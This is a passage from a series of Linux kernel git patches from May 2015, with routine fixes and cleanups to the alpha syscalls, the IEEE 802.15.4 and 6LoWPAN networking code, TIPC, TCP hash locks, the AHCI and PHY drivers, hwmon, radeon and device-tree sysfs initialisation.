cceaeddc2edf710141563c65808b5cea6829b925 Mon Sep 17 00:00:00 2001 From: Chen Gang Date: Mon, 18 May 2015 12:37:08 +0800 Subject: [PATCH 259/872] alpha: kernel: osf_sys: Set 'kts.tv_nsec' only when 'tv' has effect The related warning: CC init/do_mounts.o arch/alpha/kernel/osf_sys.c: In function 'SyS_osf_settimeofday': arch/alpha/kernel/osf_sys.c:1028:14: warning: 'kts.tv_nsec' may be used uninitialized in this function [-Wmaybe-uninitialized] kts.tv_nsec *= 1000; ^ arch/alpha/kernel/osf_sys.c:1016:18: note: 'kts' was declared here struct timespec kts; ^ Signed-off-by: Chen Gang Signed-off-by: Matt Turner --- arch/alpha/kernel/osf_sys.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/arch/alpha/kernel/osf_sys.c b/arch/alpha/kernel/osf_sys.c index e51f578636a5..36dc91ace83a 100644 --- a/arch/alpha/kernel/osf_sys.c +++ b/arch/alpha/kernel/osf_sys.c @@ -1019,14 +1019,13 @@ SYSCALL_DEFINE2(osf_settimeofday, struct timeval32 __user *, tv, if (tv) { if (get_tv32((struct timeval *)&kts, tv)) return -EFAULT; + kts.tv_nsec *= 1000; } if (tz) { if (copy_from_user(&ktz, tz, sizeof(*tz))) return -EFAULT; } - kts.tv_nsec *= 1000; - return do_sys_settimeofday(tv ? &kts : NULL, tz ? &ktz : NULL); } From b251d4de671ca0623d19b88a8af7f038499db631 Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:29 +0300 Subject: [PATCH 260/872] Documentation/networking/ieee802154.txt: fix various inaccuracies. * Update the linux-zigbee git:// repository URL. * Remove the MLME section as the current kernel does not provide a full 802.15.4 MLME implementation. * The hardmac example driver 'fakehard' was removed some time ago. * The IEEE 802.15.4 device drivers live in drivers/net/ieee802154/, not in drivers/ieee802154/. * The IEEE 802.15.4 MTU is 127 bytes, not 128 bytes. 
* Some of the 6LoWPAN code lives in net/6lowpan/. Signed-off-by: Lennert Buytenhek Reviewed-by: Stefan Schmidt Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- Documentation/networking/ieee802154.txt | 32 +++++++++---------------- 1 file changed, 11 insertions(+), 21 deletions(-) diff --git a/Documentation/networking/ieee802154.txt b/Documentation/networking/ieee802154.txt index 22bbc7225f8e..1700756af057 100644 --- a/Documentation/networking/ieee802154.txt +++ b/Documentation/networking/ieee802154.txt @@ -30,8 +30,8 @@ int sd = socket(PF_IEEE802154, SOCK_DGRAM, 0); The address family, socket addresses etc. are defined in the include/net/af_ieee802154.h header or in the special header -in our userspace package (see either linux-zigbee sourceforge download page -or git tree at git://linux-zigbee.git.sourceforge.net/gitroot/linux-zigbee). +in the userspace package (see either http://wpan.cakelab.org/ or the +git tree at https://github.com/linux-wpan/wpan-tools). One can use SOCK_RAW for passing raw data towards device xmit function. YMMV. @@ -49,15 +49,6 @@ Like with WiFi, there are several types of devices implementing IEEE 802.15.4. Those types of devices require different approach to be hooked into Linux kernel. -MLME - MAC Level Management -============================ - -Most of IEEE 802.15.4 MLME interfaces are directly mapped on netlink commands. -See the include/net/nl802154.h header. Our userspace tools package -(see above) provides CLI configuration utility for radio interfaces and simple -coordinator for IEEE 802.15.4 networks as an example users of MLME protocol. - - HardMAC ======= @@ -75,8 +66,6 @@ net_device with a pointer to struct ieee802154_mlme_ops instance. The fields assoc_req, assoc_resp, disassoc_req, start_req, and scan_req are optional. All other fields are required. -We provide an example of simple HardMAC driver at drivers/ieee802154/fakehard.c - SoftMAC ======= @@ -89,7 +78,8 @@ stack interface for network sniffers (e.g. WireShark). This layer is going to be extended soon. -See header include/net/mac802154.h and several drivers in drivers/ieee802154/. +See header include/net/mac802154.h and several drivers in +drivers/net/ieee802154/. Device drivers API @@ -114,18 +104,17 @@ Moreover IEEE 802.15.4 device operations structure should be filled. Fake drivers ============ -In addition there are two drivers available which simulate real devices with -HardMAC (fakehard) and SoftMAC (fakelb - IEEE 802.15.4 loopback driver) -interfaces. This option provides possibility to test and debug stack without -usage of real hardware. +In addition there is a driver available which simulates a real device with +SoftMAC (fakelb - IEEE 802.15.4 loopback driver) interface. This option +provides possibility to test and debug stack without usage of real hardware. -See sources in drivers/ieee802154 folder for more details. +See sources in drivers/net/ieee802154 folder for more details. 6LoWPAN Linux implementation ============================ -The IEEE 802.15.4 standard specifies an MTU of 128 bytes, yielding about 80 +The IEEE 802.15.4 standard specifies an MTU of 127 bytes, yielding about 80 octets of actual MAC payload once security is turned on, on a wireless link with a link throughput of 250 kbps or less. The 6LoWPAN adaptation format [RFC4944] was specified to carry IPv6 datagrams over such constrained links, @@ -140,7 +129,8 @@ In Semptember 2011 the standard update was published - [RFC6282]. 
It deprecates HC1 and HC2 compression and defines IPHC encoding format which is used in this Linux implementation. -All the code related to 6lowpan you may find in files: net/ieee802154/6lowpan.* +All the code related to 6lowpan you may find in files: net/6lowpan/* +and net/ieee802154/6lowpan/* To setup 6lowpan interface you need (busybox release > 1.17.0): 1. Add IEEE802.15.4 interface and initialize PANid; From d0997b44c9081071e39417b188f7db6d1ea37341 Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:33 +0300 Subject: [PATCH 261/872] ieee802154: Remove ieee802154_reduced_mlme_ops references. As there doesn't seem to be a definition of it or any users of it. Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- include/net/ieee802154_netdev.h | 6 ------ 1 file changed, 6 deletions(-) diff --git a/include/net/ieee802154_netdev.h b/include/net/ieee802154_netdev.h index 84a72a1382a8..0a87975128ec 100644 --- a/include/net/ieee802154_netdev.h +++ b/include/net/ieee802154_netdev.h @@ -430,10 +430,4 @@ ieee802154_mlme_ops(const struct net_device *dev) return dev->ml_priv; } -static inline struct ieee802154_reduced_mlme_ops * -ieee802154_reduced_mlme_ops(const struct net_device *dev) -{ - return dev->ml_priv; -} - #endif From 01c8d2bbd407a178f5bfe0312c32aec345066697 Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:39 +0300 Subject: [PATCH 262/872] ieee802154: Remove 802.15.4/6LoWPAN checks for interface MTU. In the past, 802.15.4 interfaces and 6LoWPAN interfaces used the same dev->type (ARPHRD_IEEE802154), and 802.15.4 interfaces were distinguished from 6LoWPAN interfaces by their differing dev->mtu. 6LoWPAN interfaces have their own ARPHRD type now, so there is no longer any need to check dev->mtu to distinguish 802.15.4 devices from 6LoWPAN devices. Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/ieee802154/nl-mac.c | 17 +++-------------- 1 file changed, 3 insertions(+), 14 deletions(-) diff --git a/net/ieee802154/nl-mac.c b/net/ieee802154/nl-mac.c index ada58a81b753..3503c38954f9 100644 --- a/net/ieee802154/nl-mac.c +++ b/net/ieee802154/nl-mac.c @@ -168,10 +168,7 @@ static struct net_device *ieee802154_nl_get_dev(struct genl_info *info) if (!dev) return NULL; - /* Check on mtu is currently a hacked solution because lowpan - * and wpan have the same ARPHRD type. - */ - if (dev->type != ARPHRD_IEEE802154 || dev->mtu != IEEE802154_MTU) { + if (dev->type != ARPHRD_IEEE802154) { dev_put(dev); return NULL; } @@ -455,11 +452,7 @@ int ieee802154_dump_iface(struct sk_buff *skb, struct netlink_callback *cb) idx = 0; for_each_netdev(net, dev) { - /* Check on mtu is currently a hacked solution because lowpan - * and wpan have the same ARPHRD type. - */ - if (idx < s_idx || dev->type != ARPHRD_IEEE802154 || - dev->mtu != IEEE802154_MTU) + if (idx < s_idx || dev->type != ARPHRD_IEEE802154) goto cont; if (ieee802154_nl_fill_iface(skb, NETLINK_CB(cb->skb).portid, @@ -789,11 +782,7 @@ ieee802154_llsec_dump_table(struct sk_buff *skb, struct netlink_callback *cb, int rc; for_each_netdev(net, dev) { - /* Check on mtu is currently a hacked solution because lowpan - * and wpan have the same ARPHRD type. 
- */ - if (idx < first_dev || dev->type != ARPHRD_IEEE802154 || - dev->mtu != IEEE802154_MTU) + if (idx < first_dev || dev->type != ARPHRD_IEEE802154) goto skip; data.ops = ieee802154_mlme_ops(dev); From 66a3297f6d3f9dc35e27c3cec6b4437ac13f07ff Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:45 +0300 Subject: [PATCH 263/872] ieee802154 socket: No need to check for ARPHRD_IEEE802154 in raw_bind(). ieee802154_get_dev() only returns devices that have dev->type == ARPHRD_IEEE802154, therefore, there is no need to check this again in raw_bind(). Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/ieee802154/socket.c | 6 ------ 1 file changed, 6 deletions(-) diff --git a/net/ieee802154/socket.c b/net/ieee802154/socket.c index d9fc5ccb1d0d..02abef2c1621 100644 --- a/net/ieee802154/socket.c +++ b/net/ieee802154/socket.c @@ -226,15 +226,9 @@ static int raw_bind(struct sock *sk, struct sockaddr *_uaddr, int len) goto out; } - if (dev->type != ARPHRD_IEEE802154) { - err = -ENODEV; - goto out_put; - } - sk->sk_bound_dev_if = dev->ifindex; sk_dst_reset(sk); -out_put: dev_put(dev); out: release_sock(sk); From 641459ca336edc009e044b76d16ee3d1ca6464c0 Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:51 +0300 Subject: [PATCH 264/872] mac802154: mac802154_mlme_start_req() optimisation. mac802154_mlme_start_req() calls ieee802154_mlme_ops(dev)->llsec->set_params() on the net_device passed into it, however, this net_device will always be a mac802154 net_device, so just call mac802154_set_params() directly instead. Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/mac802154/mac_cmd.c | 29 +++++++++++------------------ 1 file changed, 11 insertions(+), 18 deletions(-) diff --git a/net/mac802154/mac_cmd.c b/net/mac802154/mac_cmd.c index 5220c2b2735b..8606da459ff3 100644 --- a/net/mac802154/mac_cmd.c +++ b/net/mac802154/mac_cmd.c @@ -36,8 +36,8 @@ static int mac802154_mlme_start_req(struct net_device *dev, u8 pan_coord, u8 blx, u8 coord_realign) { - struct ieee802154_mlme_ops *ops = ieee802154_mlme_ops(dev); - int rc = 0; + struct ieee802154_llsec_params params; + int changed = 0; ASSERT_RTNL(); @@ -47,26 +47,19 @@ static int mac802154_mlme_start_req(struct net_device *dev, dev->ieee802154_ptr->short_addr = addr->short_addr; mac802154_dev_set_page_channel(dev, page, channel); - if (ops->llsec) { - struct ieee802154_llsec_params params; - int changed = 0; + params.pan_id = addr->pan_id; + changed |= IEEE802154_LLSEC_PARAM_PAN_ID; - params.coord_shortaddr = addr->short_addr; - changed |= IEEE802154_LLSEC_PARAM_COORD_SHORTADDR; + params.hwaddr = ieee802154_devaddr_from_raw(dev->dev_addr); + changed |= IEEE802154_LLSEC_PARAM_HWADDR; - params.pan_id = addr->pan_id; - changed |= IEEE802154_LLSEC_PARAM_PAN_ID; + params.coord_hwaddr = params.hwaddr; + changed |= IEEE802154_LLSEC_PARAM_COORD_HWADDR; - params.hwaddr = ieee802154_devaddr_from_raw(dev->dev_addr); - changed |= IEEE802154_LLSEC_PARAM_HWADDR; + params.coord_shortaddr = addr->short_addr; + changed |= IEEE802154_LLSEC_PARAM_COORD_SHORTADDR; - params.coord_hwaddr = params.hwaddr; - changed |= IEEE802154_LLSEC_PARAM_COORD_HWADDR; - - rc = ops->llsec->set_params(dev, ¶ms, changed); - } - - return rc; + return mac802154_set_params(dev, ¶ms, changed); } static int mac802154_set_mac_params(struct net_device *dev, From e96998fc200867f005dd14c7d1dd35e1107d4914 Mon Sep 17 00:00:00 2001 From: Nadav Haklai Date: Tue, 26 May 
2015 18:47:23 +0200 Subject: [PATCH 265/872] ata: ahci_mvebu: Fix wrongly set base address for the MBus window setting According to the Armada 38x datasheet, the window base address registers value is set in bits [31:4] of the register and corresponds to the transaction address bits [47:20]. Therefore, the 32bit base address value should be shifted right by 20bits and left by 4bits, resulting in 16 bit shift right. The bug as not been noticed yet because if the memory available on the platform is less than 2GB, then the base address is zero. [gregory.clement@free-electrons.com: add extra-explanation] Fixes: a3464ed2f14 (ata: ahci_mvebu: new driver for Marvell Armada 380 AHCI interfaces) Signed-off-by: Nadav Haklai Reviewed-by: Omri Itach Signed-off-by: Gregory CLEMENT Cc: Signed-off-by: Tejun Heo --- drivers/ata/ahci_mvebu.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/ata/ahci_mvebu.c b/drivers/ata/ahci_mvebu.c index 23716dd8a7ec..5928d0746a27 100644 --- a/drivers/ata/ahci_mvebu.c +++ b/drivers/ata/ahci_mvebu.c @@ -45,7 +45,7 @@ static void ahci_mvebu_mbus_config(struct ahci_host_priv *hpriv, writel((cs->mbus_attr << 8) | (dram->mbus_dram_target_id << 4) | 1, hpriv->mmio + AHCI_WINDOW_CTRL(i)); - writel(cs->base, hpriv->mmio + AHCI_WINDOW_BASE(i)); + writel(cs->base >> 16, hpriv->mmio + AHCI_WINDOW_BASE(i)); writel(((cs->size - 1) & 0xffff0000), hpriv->mmio + AHCI_WINDOW_SIZE(i)); } From fc4f80524368dbf3fa2eba639c7b79bb014aea0a Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Tue, 26 May 2015 23:11:31 +0200 Subject: [PATCH 266/872] nl802154: fix cca mode wpan phy flag This patch fix the handling to call cca mode setting. If the phy isn't flag then the driver doesn't support this setting. Signed-off-by: Alexander Aring Reported-by: Varka Bhadram Signed-off-by: Marcel Holtmann --- net/ieee802154/nl802154.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index 54f4959fc9bb..212a795b33c9 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -757,7 +757,7 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) struct cfg802154_registered_device *rdev = info->user_ptr[0]; struct wpan_phy_cca cca; - if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_MODE) + if (!(rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_MODE)) return -EOPNOTSUPP; if (!info->attrs[NL802154_ATTR_CCA_MODE]) From f3903bcc0091df871ac64261f65ed2e4c3519d39 Mon Sep 17 00:00:00 2001 From: Jon Paul Maloy Date: Tue, 26 May 2015 05:40:19 -0400 Subject: [PATCH 267/872] tipc: fix bug in link protocol message create function In commit dd3f9e70f59f43a5712eba9cf3ee4f1e6999540c ("tipc: add packet sequence number at instant of transmission") we made a change with the consequence that packets in the link backlog queue don't contain valid sequence numbers. However, when we create a link protocol message, we still use the sequence number of the first packet in the backlog, if there is any, as "next_sent" indicator in the message. This may entail unnecessary retransissions or stale packet transmission when there is very low traffic on the link. This commit fixes this issue by only using the current value of tipc_link::snd_nxt as indicator. Signed-off-by: Jon Maloy Signed-off-by: David S. 
Miller --- net/tipc/link.c | 2 -- 1 file changed, 2 deletions(-) diff --git a/net/tipc/link.c b/net/tipc/link.c index fb2a003c8e6d..ca8b8e0f49b5 100644 --- a/net/tipc/link.c +++ b/net/tipc/link.c @@ -1320,8 +1320,6 @@ void tipc_link_proto_xmit(struct tipc_link *l_ptr, u32 msg_typ, int probe_msg, if (!tipc_link_is_up(l_ptr)) return; - if (skb_queue_len(&l_ptr->backlogq)) - next_sent = buf_seqno(skb_peek(&l_ptr->backlogq)); msg_set_next_sent(msg, next_sent); if (!skb_queue_empty(&l_ptr->deferdq)) { last_rcv = buf_seqno(skb_peek(&l_ptr->deferdq)); From 983942a5eacae8821882a3d348618b020098e8dc Mon Sep 17 00:00:00 2001 From: "Lendacky, Thomas" Date: Tue, 26 May 2015 09:51:49 -0500 Subject: [PATCH 268/872] amd-xgbe-phy: Fix initial mode when autoneg is disabled When the ethtool command is used to set the speed of the device while the device is down, the check to set the initial mode may fail when the device is brought up, causing failure to bring the device up. Update the code to set the initial mode based on the desired speed if auto-negotiation is disabled. This patch fixes a bug introduced by: d9663c8c2149 ("amd-xgbe-phy: Use phydev advertising field vs supported") Signed-off-by: Tom Lendacky Signed-off-by: David S. Miller --- drivers/net/phy/amd-xgbe-phy.c | 45 +++++++++++++++++++++++++++++++--- 1 file changed, 42 insertions(+), 3 deletions(-) diff --git a/drivers/net/phy/amd-xgbe-phy.c b/drivers/net/phy/amd-xgbe-phy.c index fb276f64cd64..34a75cba3b73 100644 --- a/drivers/net/phy/amd-xgbe-phy.c +++ b/drivers/net/phy/amd-xgbe-phy.c @@ -755,6 +755,45 @@ static int amd_xgbe_phy_set_mode(struct phy_device *phydev, return ret; } +static bool amd_xgbe_phy_use_xgmii_mode(struct phy_device *phydev) +{ + if (phydev->autoneg == AUTONEG_ENABLE) { + if (phydev->advertising & ADVERTISED_10000baseKR_Full) + return true; + } else { + if (phydev->speed == SPEED_10000) + return true; + } + + return false; +} + +static bool amd_xgbe_phy_use_gmii_2500_mode(struct phy_device *phydev) +{ + if (phydev->autoneg == AUTONEG_ENABLE) { + if (phydev->advertising & ADVERTISED_2500baseX_Full) + return true; + } else { + if (phydev->speed == SPEED_2500) + return true; + } + + return false; +} + +static bool amd_xgbe_phy_use_gmii_mode(struct phy_device *phydev) +{ + if (phydev->autoneg == AUTONEG_ENABLE) { + if (phydev->advertising & ADVERTISED_1000baseKX_Full) + return true; + } else { + if (phydev->speed == SPEED_1000) + return true; + } + + return false; +} + static int amd_xgbe_phy_set_an(struct phy_device *phydev, bool enable, bool restart) { @@ -1235,11 +1274,11 @@ static int amd_xgbe_phy_config_init(struct phy_device *phydev) /* Set initial mode - call the mode setting routines * directly to insure we are properly configured */ - if (phydev->advertising & SUPPORTED_10000baseKR_Full) + if (amd_xgbe_phy_use_xgmii_mode(phydev)) ret = amd_xgbe_phy_xgmii_mode(phydev); - else if (phydev->advertising & SUPPORTED_1000baseKX_Full) + else if (amd_xgbe_phy_use_gmii_mode(phydev)) ret = amd_xgbe_phy_gmii_mode(phydev); - else if (phydev->advertising & SUPPORTED_2500baseX_Full) + else if (amd_xgbe_phy_use_gmii_2500_mode(phydev)) ret = amd_xgbe_phy_gmii_2500_mode(phydev); else ret = -EINVAL; From 095dc8e0c3686d586a01a50abc3e1bb9ac633054 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Tue, 26 May 2015 07:55:34 -0700 Subject: [PATCH 269/872] tcp: fix/cleanup inet_ehash_locks_alloc() If tcp ehash table is constrained to a very small number of buckets (eg boot parameter thash_entries=128), then we can crash if spinlock array has more 
entries. While we are at it, un-inline inet_ehash_locks_alloc() and make following changes : - Budget 2 cache lines per cpu worth of 'spinlocks' - Try to kmalloc() the array to avoid extra TLB pressure. (Most servers at Google allocate 8192 bytes for this hash table) - Get rid of various #ifdef Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- include/net/inet_hashtables.h | 47 +++-------------------------------- net/ipv4/inet_hashtables.c | 31 +++++++++++++++++++++++ 2 files changed, 34 insertions(+), 44 deletions(-) diff --git a/include/net/inet_hashtables.h b/include/net/inet_hashtables.h index 774d24151d4a..b73c88a19dd4 100644 --- a/include/net/inet_hashtables.h +++ b/include/net/inet_hashtables.h @@ -24,7 +24,6 @@ #include #include #include -#include #include #include @@ -164,52 +163,12 @@ static inline spinlock_t *inet_ehash_lockp( return &hashinfo->ehash_locks[hash & hashinfo->ehash_locks_mask]; } -static inline int inet_ehash_locks_alloc(struct inet_hashinfo *hashinfo) -{ - unsigned int i, size = 256; -#if defined(CONFIG_PROVE_LOCKING) - unsigned int nr_pcpus = 2; -#else - unsigned int nr_pcpus = num_possible_cpus(); -#endif - if (nr_pcpus >= 4) - size = 512; - if (nr_pcpus >= 8) - size = 1024; - if (nr_pcpus >= 16) - size = 2048; - if (nr_pcpus >= 32) - size = 4096; - if (sizeof(spinlock_t) != 0) { -#ifdef CONFIG_NUMA - if (size * sizeof(spinlock_t) > PAGE_SIZE) - hashinfo->ehash_locks = vmalloc(size * sizeof(spinlock_t)); - else -#endif - hashinfo->ehash_locks = kmalloc(size * sizeof(spinlock_t), - GFP_KERNEL); - if (!hashinfo->ehash_locks) - return ENOMEM; - for (i = 0; i < size; i++) - spin_lock_init(&hashinfo->ehash_locks[i]); - } - hashinfo->ehash_locks_mask = size - 1; - return 0; -} +int inet_ehash_locks_alloc(struct inet_hashinfo *hashinfo); static inline void inet_ehash_locks_free(struct inet_hashinfo *hashinfo) { - if (hashinfo->ehash_locks) { -#ifdef CONFIG_NUMA - unsigned int size = (hashinfo->ehash_locks_mask + 1) * - sizeof(spinlock_t); - if (size > PAGE_SIZE) - vfree(hashinfo->ehash_locks); - else -#endif - kfree(hashinfo->ehash_locks); - hashinfo->ehash_locks = NULL; - } + kvfree(hashinfo->ehash_locks); + hashinfo->ehash_locks = NULL; } struct inet_bind_bucket * diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c index 3766bddb3e8a..185efef0f125 100644 --- a/net/ipv4/inet_hashtables.c +++ b/net/ipv4/inet_hashtables.c @@ -18,6 +18,7 @@ #include #include #include +#include #include #include @@ -609,3 +610,33 @@ void inet_hashinfo_init(struct inet_hashinfo *h) } } EXPORT_SYMBOL_GPL(inet_hashinfo_init); + +int inet_ehash_locks_alloc(struct inet_hashinfo *hashinfo) +{ + unsigned int i, nblocks = 1; + + if (sizeof(spinlock_t) != 0) { + /* allocate 2 cache lines or at least one spinlock per cpu */ + nblocks = max_t(unsigned int, + 2 * L1_CACHE_BYTES / sizeof(spinlock_t), + 1); + nblocks = roundup_pow_of_two(nblocks * num_possible_cpus()); + + /* no more locks than number of hash buckets */ + nblocks = min(nblocks, hashinfo->ehash_mask + 1); + + hashinfo->ehash_locks = kmalloc_array(nblocks, sizeof(spinlock_t), + GFP_KERNEL | __GFP_NOWARN); + if (!hashinfo->ehash_locks) + hashinfo->ehash_locks = vmalloc(nblocks * sizeof(spinlock_t)); + + if (!hashinfo->ehash_locks) + return -ENOMEM; + + for (i = 0; i < nblocks; i++) + spin_lock_init(&hashinfo->ehash_locks[i]); + } + hashinfo->ehash_locks_mask = nblocks - 1; + return 0; +} +EXPORT_SYMBOL_GPL(inet_ehash_locks_alloc); From adba657533bdd255f7b78bc8a324091f46b294cd Mon Sep 17 00:00:00 2001 From: 
Chris Lesiak Date: Tue, 26 May 2015 15:40:44 -0500 Subject: [PATCH 270/872] hwmon: (ntc_thermistor) Ensure iio channel is of type IIO_VOLTAGE When configured via device tree, the associated iio device needs to be measuring voltage for the conversion to resistance to be correct. Return -EINVAL if that is not the case. Signed-off-by: Chris Lesiak Cc: stable@vger.kernel.org # 3.10+ Signed-off-by: Guenter Roeck --- drivers/hwmon/ntc_thermistor.c | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/drivers/hwmon/ntc_thermistor.c b/drivers/hwmon/ntc_thermistor.c index 112e4d45e4a0..68800115876b 100644 --- a/drivers/hwmon/ntc_thermistor.c +++ b/drivers/hwmon/ntc_thermistor.c @@ -239,8 +239,10 @@ static struct ntc_thermistor_platform_data * ntc_thermistor_parse_dt(struct platform_device *pdev) { struct iio_channel *chan; + enum iio_chan_type type; struct device_node *np = pdev->dev.of_node; struct ntc_thermistor_platform_data *pdata; + int ret; if (!np) return NULL; @@ -253,6 +255,13 @@ ntc_thermistor_parse_dt(struct platform_device *pdev) if (IS_ERR(chan)) return ERR_CAST(chan); + ret = iio_get_channel_type(chan, &type); + if (ret < 0) + return ERR_PTR(ret); + + if (type != IIO_VOLTAGE) + return ERR_PTR(-EINVAL); + if (of_property_read_u32(np, "pullup-uv", &pdata->pullup_uv)) return ERR_PTR(-ENODEV); if (of_property_read_u32(np, "pullup-ohm", &pdata->pullup_ohm)) From a10f0df0615abb194968fc08147f3cdd70fd5aa5 Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Tue, 26 May 2015 18:01:05 -0400 Subject: [PATCH 271/872] drm/radeon: don't share plls if monitors differ in audio support Enabling audio may enable different pll dividers. Don't share plls if the monitors differ in audio support. bug: https://bugzilla.kernel.org/show_bug.cgi?id=98751 Signed-off-by: Alex Deucher Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/atombios_crtc.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c index 42b2ea3fdcf3..e597ffc26563 100644 --- a/drivers/gpu/drm/radeon/atombios_crtc.c +++ b/drivers/gpu/drm/radeon/atombios_crtc.c @@ -1798,7 +1798,9 @@ static int radeon_get_shared_nondp_ppll(struct drm_crtc *crtc) if ((crtc->mode.clock == test_crtc->mode.clock) && (adjusted_clock == test_adjusted_clock) && (radeon_crtc->ss_enabled == test_radeon_crtc->ss_enabled) && - (test_radeon_crtc->pll_id != ATOM_PPLL_INVALID)) + (test_radeon_crtc->pll_id != ATOM_PPLL_INVALID) && + (drm_detect_monitor_audio(radeon_connector_edid(test_radeon_crtc->connector)) == + drm_detect_monitor_audio(radeon_connector_edid(radeon_crtc->connector)))) return test_radeon_crtc->pll_id; } } From 194ec9368c0dbc421acdb2620d4dfb3cc3d022ff Mon Sep 17 00:00:00 2001 From: Sudeep Holla Date: Thu, 14 May 2015 15:28:24 +0100 Subject: [PATCH 272/872] drivers: of/base: move of_init to driver_init Commit 5590f3196b29 ("drivers/core/of: Add symlink to device-tree from devices with an OF node") adds the symlink `of_node` for each device pointing to it's device tree node while creating/initialising it. However the devicetree sysfs is created and setup in of_init which is executed at core_initcall level. For all the devices created before of_init, the following error is thrown: "Error -2(-ENOENT) creating of_node link" Like many other components in driver model, initialize the sysfs support for OF/devicetree from driver_init so that it's ready before any devices are created. 
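The ordering requirement is easy to reproduce outside the kernel. The following is a reduced, hypothetical userspace C sketch (not kernel code; every name in it is invented) of the same failure mode: a consumer that runs before the subsystem's explicit initialisation hits the -ENOENT symptom, while calling the init from the one place that owns start-up ordering makes it go away.

#include <stdbool.h>
#include <stdio.h>

static bool sysfs_ready;

/* stands in for of_core_init(): must run before any device is created */
static void subsystem_core_init(void)
{
	sysfs_ready = true;
}

static void create_device(const char *name)
{
	/* mirrors the "Error -2(-ENOENT) creating of_node link" message */
	if (!sysfs_ready)
		printf("Error -2(-ENOENT) creating %s link\n", name);
	else
		printf("created %s link\n", name);
}

int main(void)
{
	create_device("early-device");	/* too early: init has not run yet */

	subsystem_core_init();		/* explicit call from the owner of ordering */
	create_device("late-device");	/* now guaranteed to succeed */
	return 0;
}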
Fixes: 5590f3196b29 ("drivers/core/of: Add symlink to device-tree from devices with an OF node") Suggested-by: Rob Herring Cc: Grant Likely Cc: Pawel Moll Cc: Benjamin Herrenschmidt Signed-off-by: Sudeep Holla Tested-by: Robert Schwebel Acked-by: Rob Herring Signed-off-by: Greg Kroah-Hartman --- drivers/base/init.c | 2 ++ drivers/of/base.c | 8 +++----- include/linux/of.h | 6 ++++++ 3 files changed, 11 insertions(+), 5 deletions(-) diff --git a/drivers/base/init.c b/drivers/base/init.c index da033d3bab3c..48c0e220acc0 100644 --- a/drivers/base/init.c +++ b/drivers/base/init.c @@ -8,6 +8,7 @@ #include #include #include +#include #include "base.h" @@ -34,4 +35,5 @@ void __init driver_init(void) cpu_dev_init(); memory_dev_init(); container_dev_init(); + of_core_init(); } diff --git a/drivers/of/base.c b/drivers/of/base.c index 99764db0875a..f0650265febf 100644 --- a/drivers/of/base.c +++ b/drivers/of/base.c @@ -189,7 +189,7 @@ int __of_attach_node_sysfs(struct device_node *np) return 0; } -static int __init of_init(void) +void __init of_core_init(void) { struct device_node *np; @@ -198,7 +198,8 @@ static int __init of_init(void) of_kset = kset_create_and_add("devicetree", NULL, firmware_kobj); if (!of_kset) { mutex_unlock(&of_mutex); - return -ENOMEM; + pr_err("devicetree: failed to register existing nodes\n"); + return; } for_each_of_allnodes(np) __of_attach_node_sysfs(np); @@ -207,10 +208,7 @@ static int __init of_init(void) /* Symlink in /proc as required by userspace ABI */ if (of_root) proc_symlink("device-tree", NULL, "/sys/firmware/devicetree/base"); - - return 0; } -core_initcall(of_init); static struct property *__of_find_property(const struct device_node *np, const char *name, int *lenp) diff --git a/include/linux/of.h b/include/linux/of.h index ddeaae6d2083..b871ff9d81d7 100644 --- a/include/linux/of.h +++ b/include/linux/of.h @@ -121,6 +121,8 @@ extern struct device_node *of_stdout; extern raw_spinlock_t devtree_lock; #ifdef CONFIG_OF +void of_core_init(void); + static inline bool is_of_node(struct fwnode_handle *fwnode) { return fwnode && fwnode->type == FWNODE_OF; @@ -376,6 +378,10 @@ bool of_console_check(struct device_node *dn, char *name, int index); #else /* CONFIG_OF */ +static inline void of_core_init(void) +{ +} + static inline bool is_of_node(struct fwnode_handle *fwnode) { return false; From b48732e4a48d80ed4a14812f0bab09560846514e Mon Sep 17 00:00:00 2001 From: Mark Salyzyn Date: Tue, 26 May 2015 08:22:19 -0700 Subject: [PATCH 273/872] unix/caif: sk_socket can disappear when state is unlocked got a rare NULL pointer dereference in clear_bit Signed-off-by: Mark Salyzyn Acked-by: Hannes Frederic Sowa ---- v2: switch to sock_flag(sk, SOCK_DEAD) and added net/caif/caif_socket.c v3: return -ECONNRESET in upstream caller of wait function for SOCK_DEAD Signed-off-by: David S. 
